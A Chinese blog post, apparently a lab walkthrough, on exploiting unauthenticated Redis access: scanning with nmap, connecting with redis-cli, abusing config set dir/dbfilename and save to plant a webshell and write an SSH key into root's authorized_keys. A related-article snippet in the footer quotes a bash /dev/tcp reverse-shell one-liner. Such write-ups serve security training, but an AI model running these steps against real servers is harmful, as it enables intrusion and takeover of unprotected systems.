redis未授权访问漏洞的利用

最新推荐文章于 2024-06-13 09:00:30 发布
最新推荐文章于 2024-06-13 09:00:30 发布
阅读量374 收藏 10
点赞数 6
文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/134442423
版权

当redis服务(6379)端口对外开放且未作密码认证时,任意用户可未授权访问redis服务并操作获取其数据。
攻击机:10.1.1.100 kali
目标靶机:10.1.1.200
一、探测redis的未授权访问
首先在攻击机上使用nmap对目标机进行扫描,探测开放的服务与端口。
使用全端口扫描,探测存在的服务: nmap -p- -sV 10.1.1.200

图片


探测到靶机开放了多个端口,其中存在redis服务的6379端口,开始尝试是否存在redis未授权访问漏洞。
下载redis连接工具,解压后使用make命令进行编译。

图片


编译后的redis-cli文件存放在src目录中,将其复制到bin目录下,就可以在任意位置执行。

图片


使用redis-cli工具对redis数据尝试进行连接。
redis-cli -h 10.1.1.200 -p 6379

图片


连接成功,这个地方存在一个未授权访问。

二、利用未授权访问漏洞写入一句话木马。
对之前使用nmap扫描到的80端口进行访问,发现了一个页面,判断存在web服务,尝试使用扫描工具对目录进行一个探测。

图片


使用dirsearch工具进行目录的探测,发现还存在一个phpinfo目录。

图片

图片


看到了网站的根目录

图片


利用之前已经远程连接到的redis数据库,利用写入备份文件的方式,在这个地方可以尝试写入一句话木马。
config set dir <路径> #设置备份路径
config set dbfilename <文件名> #设置备份文件的名字
set <key> <value> #写入数据
save #保存

图片


访问目标,拿到webshell

图片

三、利用redis未授权访问写入ssh公钥获取shell
先生成ssh的公钥,公钥文件一般保存在/root/.ssh目录下
ssh-keygen -t rsa

图片


将公钥写入到foo.txt文件中,前后使用换行,必然和其他符号连接产生其他不可预知错误。
(echo -e “\n\n”; cat ~/.ssh/id_rsa.pub; echo -e “\n\n”) > /tmp/foo.txt

图片


将公钥信息写入到目标靶机
cat /tmp/foo.txt | redis-cli -h 10.1.1.200 -p 6379 -x set sshkey

图片


再一次利用备份功能写入公钥的备份文件。
config set dir /root/.ssh
config set dbfilename authorized_keys
save

图片


使用ssh连接方式:ssh root@10.1.1.200 -i /root/.ssh/id_rsa

图片


成功获取到shell。

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

zkzq
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis授权访问漏洞利用
weixin_53440207的博客
03-12 534
Redis授权访问漏洞利用
redis授权访问漏洞利用
weixin_53562844的博客
05-07 2155
redis是一个key-value存储系统,拥有强大的功能,目前普及率很高,redis是用ansic语言编写,支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的APL,reids默认端口是6379。造成授权漏洞的原因是安全配置作限制,redis默认情况是空密码连接。 利用条件:redis <3.2 利用原理:redis绑定在0.0.0.0:6379,且没有进行添加安全策略,直接暴露在公网,默认是空密码,可以让攻击者免密码登录redis服务。 靶机:192.
Redis 授权访问漏洞利用及修复
Thunderclap的博客
06-25 3877
Redis 授权访问漏洞利用及修复
Redis授权访问漏洞利用
weixin_68681298的博客
07-26 229
bash -i >& /dev/tcp/192.168.142.44/7777 0>&1:打开一个交互式的bash终端,与远程机器建立一个socket连接将标准错误输出合并到标准输出中,将标准输入重定向到标准输出中。启动Redis服务:/usr/local/soft/redis-6.0.9/src/redis-server /usr/local/soft/redis-6.0.9/redis.conf。进入客户端:/usr/local/soft/redis-6.0.9/src/redis-cli。
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1114
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1142
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
redis授权访问漏洞利用+redis日志分析
ChenD的学习笔记
05-22 1448
下载: wget http://download.redis.io/releases/redis-2.8.17.tar.gz。将redis-server复制到/usr/bin目录下:cp redis-server /usr/bin/将只允许本地连接注释掉,保护模式关掉,然后保存一下,再启动redis服务,再使用kali连接一下。将redis-cli复制到/usr/bin目录下:cp redis-cli /usr/bin/将redis-server 移动到/usr/bin/
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3280
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库缓存和消息队列。
Redis授权访问漏洞复现
qq_56426046的博客
09-11 644
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存也可以持久化的日执行、Key-Value数据库。首先下载redis,redis-4.0.10之前的版本Redis默认情况下会出现授权访问,其中在redis3.2之后,redis增加了protected-mode,禁止外网访问redis,如果启用了,外网访问redis,会报出异常redis-.4.0.10之后的版本默认开启了保护模式,仅允许本地无密码验证连接。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权.pdf
12-02
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权
redis的基本数据类型】
最新发布
m0_50116974的博客
06-13 526
压缩列表的基本信息包括压缩列表的大小,压缩列表的长度以及最后一个entry的偏移,之所以要有这个偏移,是为了找到最后一个entry,而每个entry都记录上一个元素的大小,通过计算就知道上一个entry的地址,这样方便的从后向前进行遍历。的结构,其分为两部分,8字节的Redis对象元数据信息,8字节的指针,其中Redis对象的元数据信息存储了类型的LRU信息,真正的编码格式等等,而如果字符串存储的是数字类型,则复用了8字节的指针的位置。的操作,但是当列表的元素非常少的时候,其内部使用。
Redis的一点入门了解
qq_41680016的博客
06-11 937
泛指非关系型数据库的,随着web2.0互联网的诞生,传统的关系型数据库很难对付web2.0时代,尤其是超大规模的高并发的社区,渐渐暴露出很多难以克服的问题,而NoSQL在当今大数据环境下发展的十分迅速,Redis是发展的最快的,而且是我们当下必须要掌握的一门技术。核心:redis是将所有的数据全部放在内存中,所以说使用单线程去操作效率就是最高的,多线程(CPU上下文切换消耗的时间相对就比较多),对于内存系统来说,如果没有上下文切换,效率就是最高的,多次读写都在一个CPU上,怎能不快呢。
Redis的监控与调优:工具使用和性能提升技巧
哎 你看的博客
06-11 1024
I. 引言 A. 介绍Redis的重要性,以及为什么需要对Redis进行监控和调优 B. 概述本文的主要内容和目的 II. Redis监控工具的使用 A. 介绍Redis自带的监控工具,如INFO命令、MONITOR命令等 B. 介绍第三方的Redis监控工具,如Redisson PRO、Redis Insight等 C. 提供使用各种监控工具的实践示例和解读 III. Redis性能问题的诊断 A. 介绍如何使用监控工具发现Redis的性能问题,如内存泄漏、瓶颈等 B. 提供诊断性能问题的实践示例和解读
Redis 搭建主从复制、哨兵模式【Windows】
weixin_64433668的博客
06-11 1154
定义:Redis 主从复制模式是一种数据同步策略,通过配置多台 Redis 服务器,一台作为主服务器(Master),负责处理写操作;而其他服务器作为从服务器(Slave),负责处理读操作。特点主从复制模式实现了读写分离,主服务器专注于处理写操作,而从服务器则专注于处理读操作,从而减轻主服务器的压力。主从复制模式提供了数据冗余,即使主服务器出现故障,从服务器仍然可以提供服务,保证系统的可用性。OK!关于 Redis 主从复制以及哨兵模式的搭建就到这里,之后我们还会介绍搭建 Redis 集群。
026、工具_redis-server
细致-专业-实操
06-12 212
整个内存检测的时间比较长。通常无需每次开启Redis实例时都执行–test-memory选项,该功能更偏向 于调试和测试,例如,想快速占满机器内存做一些极端条件的测试,这个功 能是一个不错的选择。redis-server除了启动Redis外,还有一个 --test-memory选项。
redis windos修复版本
清风
06-10 419
【代码】redis windos修复版本。
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值